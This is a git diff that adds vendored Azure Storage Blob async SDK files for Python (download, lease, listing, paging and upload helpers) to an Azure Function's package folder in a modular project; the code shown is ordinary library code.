min(self._file_size, self._end_range - self._start_range + 1) + elif self._start_range is not None: + self.size = self._file_size - self._start_range + else: + self.size = self._file_size + retry_active = False + + except HttpResponseError as error: + if self._start_range is None and error.response.status_code == 416: + # Get range will fail on an empty file. If the user did not + # request a range, do a regular get request in order to get + # any properties. 
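+ # The fallback GET below carries no range header; on success the download + # size is recorded as zero and the response is kept only for its properties.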
+ try: + _, response = await self._clients.blob.download( + validate_content=self._validate_content, + data_stream_total=0, + download_stream_current=0, + **self._request_options) + retry_active = False + except HttpResponseError as error: + process_storage_error(error) + + # Set the download size to empty + self.size = 0 + self._file_size = 0 + else: + process_storage_error(error) + + except ClientPayloadError as error: + retry_total -= 1 + if retry_total <= 0: + raise ServiceResponseError(error, error=error) + await asyncio.sleep(1) + + # get page ranges to optimize downloading sparse page blob + if response.properties.blob_type == 'PageBlob': + try: + page_ranges = await self._clients.page_blob.get_page_ranges() + self._non_empty_ranges = get_page_ranges_result(page_ranges)[0] + except HttpResponseError: + pass + + # If the file is small, the download is complete at this point. + # If file size is large, download the rest of the file in chunks. + if response.properties.size != self.size: + if self._request_options.get('modified_access_conditions'): + self._request_options['modified_access_conditions'].if_match = response.properties.etag + else: + self._download_complete = True + return response + + def chunks(self): + # type: () -> AsyncIterator[bytes] + """Iterate over chunks in the download stream. + + :rtype: AsyncIterator[bytes] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world_async.py + :start-after: [START download_a_blob_in_chunk] + :end-before: [END download_a_blob_in_chunk] + :language: python + :dedent: 16 + :caption: Download a blob using chunks(). + """ + if self.size == 0 or self._download_complete: + iter_downloader = None + else: + data_end = self._file_size + if self._end_range is not None: + # Use the length unless it is over the end of the file + data_end = min(self._file_size, self._end_range + 1) + iter_downloader = _AsyncChunkDownloader( + client=self._clients.blob, + non_empty_ranges=self._non_empty_ranges, + total_size=self.size, + chunk_size=self._config.max_chunk_get_size, + current_progress=self._first_get_size, + start_range=self._initial_range[1] + 1, # Start where the first download ended + end_range=data_end, + stream=None, + parallel=False, + validate_content=self._validate_content, + encryption_options=self._encryption_options, + use_location=self._location_mode, + **self._request_options) + return _AsyncChunkIterator( + size=self.size, + content=self._current_content, + downloader=iter_downloader, + chunk_size=self._config.max_chunk_get_size) + + async def readall(self): + """Download the contents of this blob. + + This operation is blocking until all data is downloaded. + :rtype: bytes or str + """ + stream = BytesIO() + await self.readinto(stream) + data = stream.getvalue() + if self._encoding: + return data.decode(self._encoding) + return data + + async def content_as_bytes(self, max_concurrency=1): + """Download the contents of this file. + + This operation is blocking until all data is downloaded. + + :keyword int max_concurrency: + The number of parallel connections with which to download. + :rtype: bytes + """ + warnings.warn( + "content_as_bytes is deprecated, use readall instead", + DeprecationWarning + ) + self._max_concurrency = max_concurrency + return await self.readall() + + async def content_as_text(self, max_concurrency=1, encoding="UTF-8"): + """Download the contents of this blob, and decode as text. + + This operation is blocking until all data is downloaded. 
+ + :param int max_concurrency: + The number of parallel connections with which to download. + :param str encoding: + Text encoding used to decode the downloaded bytes. Default is UTF-8. + :rtype: str + """ + warnings.warn( + "content_as_text is deprecated, use readall instead", + DeprecationWarning + ) + self._max_concurrency = max_concurrency + self._encoding = encoding + return await self.readall() + + async def readinto(self, stream): + """Download the contents of this blob to a stream. + + :param stream: + The stream to download to. This can be an open file-handle, + or any writable stream. The stream must be seekable if the download + uses more than one parallel connection. + :returns: The number of bytes read. + :rtype: int + """ + # the stream must be seekable if parallel download is required + parallel = self._max_concurrency > 1 + if parallel: + error_message = "Target stream handle must be seekable." + if sys.version_info >= (3,) and not stream.seekable(): + raise ValueError(error_message) + + try: + stream.seek(stream.tell()) + except (NotImplementedError, AttributeError): + raise ValueError(error_message) + + # Write the content to the user stream + stream.write(self._current_content) + if self._progress_hook: + await self._progress_hook(len(self._current_content), self.size) + + if self._download_complete: + return self.size + + data_end = self._file_size + if self._end_range is not None: + # Use the length unless it is over the end of the file + data_end = min(self._file_size, self._end_range + 1) + + downloader = _AsyncChunkDownloader( + client=self._clients.blob, + non_empty_ranges=self._non_empty_ranges, + total_size=self.size, + chunk_size=self._config.max_chunk_get_size, + current_progress=self._first_get_size, + start_range=self._initial_range[1] + 1, # start where the first download ended + end_range=data_end, + stream=stream, + parallel=parallel, + validate_content=self._validate_content, + encryption_options=self._encryption_options, + use_location=self._location_mode, + progress_hook=self._progress_hook, + **self._request_options) + + dl_tasks = downloader.get_chunk_offsets() + running_futures = [ + asyncio.ensure_future(downloader.process_chunk(d)) + for d in islice(dl_tasks, 0, self._max_concurrency) + ] + while running_futures: + # Wait for some download to finish before adding a new one + done, running_futures = await asyncio.wait( + running_futures, return_when=asyncio.FIRST_COMPLETED) + try: + for task in done: + task.result() + except HttpResponseError as error: + process_storage_error(error) + try: + next_chunk = next(dl_tasks) + except StopIteration: + break + else: + running_futures.add(asyncio.ensure_future(downloader.process_chunk(next_chunk))) + + if running_futures: + # Wait for the remaining downloads to finish + done, _running_futures = await asyncio.wait(running_futures) + try: + for task in done: + task.result() + except HttpResponseError as error: + process_storage_error(error) + return self.size + + async def download_to_stream(self, stream, max_concurrency=1): + """Download the contents of this blob to a stream. + + :param stream: + The stream to download to. This can be an open file-handle, + or any writable stream. The stream must be seekable if the download + uses more than one parallel connection. + :param int max_concurrency: + The number of parallel connections with which to download. + :returns: The properties of the downloaded blob. 
+ :rtype: Any + """ + warnings.warn( + "download_to_stream is deprecated, use readinto instead", + DeprecationWarning + ) + self._max_concurrency = max_concurrency + await self.readinto(stream) + return self.properties diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_lease_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_lease_async.py new file mode 100644 index 0000000..a77796a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_lease_async.py @@ -0,0 +1,325 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=invalid-overridden-method + +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, IO, Iterable, AnyStr, Dict, List, Tuple, + TypeVar, TYPE_CHECKING +) + +from azure.core.exceptions import HttpResponseError +from azure.core.tracing.decorator_async import distributed_trace_async + +from .._shared.response_handlers import return_response_headers, process_storage_error +from .._serialize import get_modify_conditions +from .._lease import BlobLeaseClient as LeaseClientBase + +if TYPE_CHECKING: + from datetime import datetime + from .._generated.operations import BlobOperations, ContainerOperations + BlobClient = TypeVar("BlobClient") + ContainerClient = TypeVar("ContainerClient") + + +class BlobLeaseClient(LeaseClientBase): + """Creates a new BlobLeaseClient. + + This client provides lease operations on a BlobClient or ContainerClient. + + :ivar str id: + The ID of the lease currently being maintained. This will be `None` if no + lease has yet been acquired. + :ivar str etag: + The ETag of the lease currently being maintained. This will be `None` if no + lease has yet been acquired or modified. + :ivar ~datetime.datetime last_modified: + The last modified timestamp of the lease currently being maintained. + This will be `None` if no lease has yet been acquired or modified. + + :param client: + The client of the blob or container to lease. + :type client: ~azure.storage.blob.aio.BlobClient or + ~azure.storage.blob.aio.ContainerClient + :param str lease_id: + A string representing the lease ID of an existing lease. This value does not + need to be specified in order to acquire a new lease, or break one. + """ + + def __enter__(self): + raise TypeError("Async lease must use 'async with'.") + + def __exit__(self, *args): + self.release() + + async def __aenter__(self): + return self + + async def __aexit__(self, *args): + await self.release() + + @distributed_trace_async + async def acquire(self, lease_duration=-1, **kwargs): + # type: (int, Any) -> None + """Requests a new lease. + + If the container does not have an active lease, the Blob service creates a + lease on the container and returns a new lease ID. + + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :keyword ~datetime.datetime if_modified_since: + A DateTime value. 
Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = await self._client.acquire_lease( + timeout=kwargs.pop('timeout', None), + duration=lease_duration, + proposed_lease_id=self.id, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + self.etag = response.get('etag') # type: str + + @distributed_trace_async + async def renew(self, **kwargs): + # type: (Any) -> None + """Renews the lease. + + The lease can be renewed if the lease ID specified in the + lease client matches that associated with the container or blob. Note that + the lease may be renewed even if it has expired as long as the container + or blob has not been leased again since the expiration of that lease. When you + renew a lease, the lease duration clock resets. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. 
versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = await self._client.renew_lease( + lease_id=self.id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace_async + async def release(self, **kwargs): + # type: (Any) -> None + """Release the lease. + + The lease may be released if the client lease id specified matches + that associated with the container or blob. Releasing the lease allows another client + to immediately acquire the lease for the container or blob as soon as the release is complete. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = await self._client.release_lease( + lease_id=self.id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace_async + async def change(self, proposed_lease_id, **kwargs): + # type: (str, Any) -> None + """Change the lease ID of an active lease. + + :param str proposed_lease_id: + Proposed lease ID, in a GUID string format. The Blob service returns 400 + (Invalid request) if the proposed lease ID is not in the correct format. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. 
+ :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = await self._client.change_lease( + lease_id=self.id, + proposed_lease_id=proposed_lease_id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace_async + async def break_lease(self, lease_break_period=None, **kwargs): + # type: (Optional[int], Any) -> int + """Break the lease, if the container or blob has an active lease. + + Once a lease is broken, it cannot be renewed. Any authorized request can break the lease; + the request is not required to specify a matching lease ID. When a lease + is broken, the lease break period is allowed to elapse, during which time + no lease operation except break and release can be performed on the container or blob. + When a lease is successfully broken, the response indicates the interval + in seconds until a new lease can be acquired. + + :param int lease_break_period: + This is the proposed duration of seconds that the lease + should continue before it is broken, between 0 and 60 seconds. This + break period is only used if it is shorter than the time remaining + on the lease. If longer, the time remaining on the lease is used. + A new lease will not be available before the break period has + expired, but the lease may be held for longer than the break + period. If this header does not appear with a break + operation, a fixed-duration lease breaks after the remaining lease + period elapses, and an infinite lease breaks immediately. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. 
+ :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: Approximate time remaining in the lease period, in seconds. + :rtype: int + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = await self._client.break_lease( + timeout=kwargs.pop('timeout', None), + break_period=lease_break_period, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return response.get('lease_time') # type: ignore diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_list_blobs_helper.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_list_blobs_helper.py new file mode 100644 index 0000000..98d70a7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_list_blobs_helper.py @@ -0,0 +1,171 @@ +# pylint: disable=too-many-lines +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +try: + from urllib.parse import unquote +except ImportError: + from urllib import unquote +from azure.core.async_paging import AsyncPageIterator, AsyncItemPaged +from azure.core.exceptions import HttpResponseError +from .._deserialize import get_blob_properties_from_generated_code +from .._models import BlobProperties +from .._generated.models import BlobItemInternal, BlobPrefix as GenBlobPrefix +from .._shared.models import DictMixin +from .._shared.response_handlers import return_context_and_deserialized, process_storage_error + + +class BlobPropertiesPaged(AsyncPageIterator): + """An Iterable of Blob properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.models.BlobProperties) + :ivar str container: The container that the blobs are listed from. + :ivar str delimiter: A delimiting character used for hierarchy listing. + + :param callable command: Function to retrieve the next page of items. + :param str container: The container that the blobs are listed from. + :param str prefix: Filters the results to return only blobs whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str continuation_token: An opaque continuation token. + :param str delimiter: + Used to capture blobs whose names begin with the same substring up to + the appearance of the delimiter character. The delimiter may be a single + character or a string. + :param location_mode: Specifies the location the request should be sent to. 
+ This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. + """ + def __init__( + self, command, + container=None, + prefix=None, + results_per_page=None, + continuation_token=None, + delimiter=None, + location_mode=None): + super(BlobPropertiesPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.prefix = prefix + self.marker = None + self.results_per_page = results_per_page + self.container = container + self.delimiter = delimiter + self.current_page = None + self.location_mode = location_mode + + async def _get_next_cb(self, continuation_token): + try: + return await self._command( + prefix=self.prefix, + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + async def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.prefix = self._response.prefix + self.marker = self._response.marker + self.results_per_page = self._response.max_results + self.container = self._response.container_name + self.current_page = [self._build_item(item) for item in self._response.segment.blob_items] + + return self._response.next_marker or None, self.current_page + + def _build_item(self, item): + if isinstance(item, BlobProperties): + return item + if isinstance(item, BlobItemInternal): + blob = get_blob_properties_from_generated_code(item) # pylint: disable=protected-access + blob.container = self.container + return blob + return item + + +class BlobPrefix(AsyncItemPaged, DictMixin): + """An Iterable of Blob properties. + + Returned from walk_blobs when a delimiter is used. + Can be thought of as a virtual blob directory. + + :ivar str name: The prefix, or "directory name" of the blob. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str marker: The continuation token of the current page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.models.BlobProperties) + :ivar str container: The container that the blobs are listed from. + :ivar str delimiter: A delimiting character used for hierarchy listing. + :param callable command: Function to retrieve the next page of items. + :param str prefix: Filters the results to return only blobs whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str marker: An opaque continuation token. + :param str delimiter: + Used to capture blobs whose names begin with the same substring up to + the appearance of the delimiter character. The delimiter may be a single + character or a string. + :param location_mode: Specifies the location the request should be sent to. + This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. 
+ """ + def __init__(self, *args, **kwargs): + super(BlobPrefix, self).__init__(*args, page_iterator_class=BlobPrefixPaged, **kwargs) + self.name = kwargs.get('prefix') + self.prefix = kwargs.get('prefix') + self.results_per_page = kwargs.get('results_per_page') + self.container = kwargs.get('container') + self.delimiter = kwargs.get('delimiter') + self.location_mode = kwargs.get('location_mode') + + +class BlobPrefixPaged(BlobPropertiesPaged): + def __init__(self, *args, **kwargs): + super(BlobPrefixPaged, self).__init__(*args, **kwargs) + self.name = self.prefix + + async def _extract_data_cb(self, get_next_return): + continuation_token, _ = await super(BlobPrefixPaged, self)._extract_data_cb(get_next_return) + self.current_page = self._response.segment.blob_prefixes + self._response.segment.blob_items + self.current_page = [self._build_item(item) for item in self.current_page] + self.delimiter = self._response.delimiter + + return continuation_token, self.current_page + + def _build_item(self, item): + item = super(BlobPrefixPaged, self)._build_item(item) + if isinstance(item, GenBlobPrefix): + if item.name.encoded: + name = unquote(item.name.content) + else: + name = item.name.content + return BlobPrefix( + self._command, + container=self.container, + prefix=name, + results_per_page=self.results_per_page, + location_mode=self.location_mode) + return item diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_models.py new file mode 100644 index 0000000..f44caa1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_models.py @@ -0,0 +1,179 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=too-few-public-methods, too-many-instance-attributes +# pylint: disable=super-init-not-called, too-many-lines + +from azure.core.async_paging import AsyncPageIterator +from azure.core.exceptions import HttpResponseError +from .._deserialize import parse_tags + +from .._models import ContainerProperties, FilteredBlob, parse_page_list +from .._shared.response_handlers import return_context_and_deserialized, process_storage_error + +from .._generated.models import FilterBlobItem + + +class ContainerPropertiesPaged(AsyncPageIterator): + """An Iterable of Container properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A container name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.models.ContainerProperties) + + :param callable command: Function to retrieve the next page of items. + :param str prefix: Filters the results to return only containers whose names + begin with the specified prefix. 
+ :param int results_per_page: The maximum number of container names to retrieve per + call. + :param str continuation_token: An opaque continuation token. + """ + def __init__(self, command, prefix=None, results_per_page=None, continuation_token=None): + super(ContainerPropertiesPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.prefix = prefix + self.marker = None + self.results_per_page = results_per_page + self.location_mode = None + self.current_page = [] + + async def _get_next_cb(self, continuation_token): + try: + return await self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + async def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.prefix = self._response.prefix + self.marker = self._response.marker + self.results_per_page = self._response.max_results + self.current_page = [self._build_item(item) for item in self._response.container_items] + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_item(item): + return ContainerProperties._from_generated(item) # pylint: disable=protected-access + + +class FilteredBlobPaged(AsyncPageIterator): + """An Iterable of Blob properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str continuation_token: The continuation token to retrieve the next page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.BlobProperties) + :ivar str container: The container that the blobs are listed from. + + :param callable command: Function to retrieve the next page of items. + :param str container: The name of the container. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str continuation_token: An opaque continuation token. + :param location_mode: Specifies the location the request should be sent to. + This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. 
+ """ + def __init__( + self, command, + container=None, + results_per_page=None, + continuation_token=None, + location_mode=None): + super(FilteredBlobPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.marker = continuation_token + self.results_per_page = results_per_page + self.container = container + self.current_page = None + self.location_mode = location_mode + + async def _get_next_cb(self, continuation_token): + try: + return await self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + async def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.marker = self._response.next_marker + self.current_page = [self._build_item(item) for item in self._response.blobs] + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_item(item): + if isinstance(item, FilterBlobItem): + tags = parse_tags(item.tags) + blob = FilteredBlob(name=item.name, container_name=item.container_name, tags=tags) + return blob + return item + + +class PageRangePaged(AsyncPageIterator): + def __init__(self, command, results_per_page=None, continuation_token=None): + super(PageRangePaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.results_per_page = results_per_page + self.location_mode = None + self.current_page = [] + + async def _get_next_cb(self, continuation_token): + try: + return await self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + async def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.current_page = self._build_page(self._response) + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_page(response): + if not response: + raise StopIteration + + return parse_page_list(response) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_upload_helpers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_upload_helpers.py new file mode 100644 index 0000000..972d104 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_upload_helpers.py @@ -0,0 +1,294 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
+# -------------------------------------------------------------------------- +# pylint: disable=no-self-use + +from io import SEEK_SET, UnsupportedOperation +from typing import Optional, Union, Any, TypeVar, TYPE_CHECKING # pylint: disable=unused-import + +import six +from azure.core.exceptions import ResourceModifiedError, HttpResponseError + +from .._shared.response_handlers import ( + process_storage_error, + return_response_headers) +from .._shared.uploads_async import ( + upload_data_chunks, + upload_substream_blocks, + BlockBlobChunkUploader, + PageBlobChunkUploader, + AppendBlobChunkUploader) +from .._shared.encryption import generate_blob_encryption_data, encrypt_blob +from .._generated.models import ( + BlockLookupList, + AppendPositionAccessConditions, + ModifiedAccessConditions, +) +from .._upload_helpers import _convert_mod_error, _any_conditions + +if TYPE_CHECKING: + from datetime import datetime # pylint: disable=unused-import + BlobLeaseClient = TypeVar("BlobLeaseClient") + + +async def upload_block_blob( # pylint: disable=too-many-locals + client=None, + data=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if not overwrite and not _any_conditions(**kwargs): + kwargs['modified_access_conditions'].if_none_match = '*' + adjusted_count = length + if (encryption_options.get('key') is not None) and (adjusted_count is not None): + adjusted_count += (16 - (length % 16)) + blob_headers = kwargs.pop('blob_headers', None) + tier = kwargs.pop('standard_blob_tier', None) + blob_tags_string = kwargs.pop('blob_tags_string', None) + + immutability_policy = kwargs.pop('immutability_policy', None) + immutability_policy_expiry = None if immutability_policy is None else immutability_policy.expiry_time + immutability_policy_mode = None if immutability_policy is None else immutability_policy.policy_mode + legal_hold = kwargs.pop('legal_hold', None) + progress_hook = kwargs.pop('progress_hook', None) + + # Do single put if the size is smaller than config.max_single_put_size + if adjusted_count is not None and (adjusted_count <= blob_settings.max_single_put_size): + try: + data = data.read(length) + if not isinstance(data, six.binary_type): + raise TypeError('Blob data should be of type bytes.') + except AttributeError: + pass + if encryption_options.get('key'): + encryption_data, data = encrypt_blob(data, encryption_options['key']) + headers['x-ms-meta-encryptiondata'] = encryption_data + response = await client.upload( + body=data, + content_length=adjusted_count, + blob_http_headers=blob_headers, + headers=headers, + cls=return_response_headers, + validate_content=validate_content, + data_stream_total=adjusted_count, + upload_stream_current=0, + tier=tier.value if tier else None, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + **kwargs) + + if progress_hook: + await progress_hook(adjusted_count, adjusted_count) + + return response + + use_original_upload_path = blob_settings.use_byte_buffer or \ + validate_content or encryption_options.get('required') or \ + blob_settings.max_block_size < blob_settings.min_large_block_upload_threshold or \ + hasattr(stream, 'seekable') and not stream.seekable() or \ + not hasattr(stream, 'seek') or not hasattr(stream, 'tell') + + if use_original_upload_path: + if encryption_options.get('key'): + 
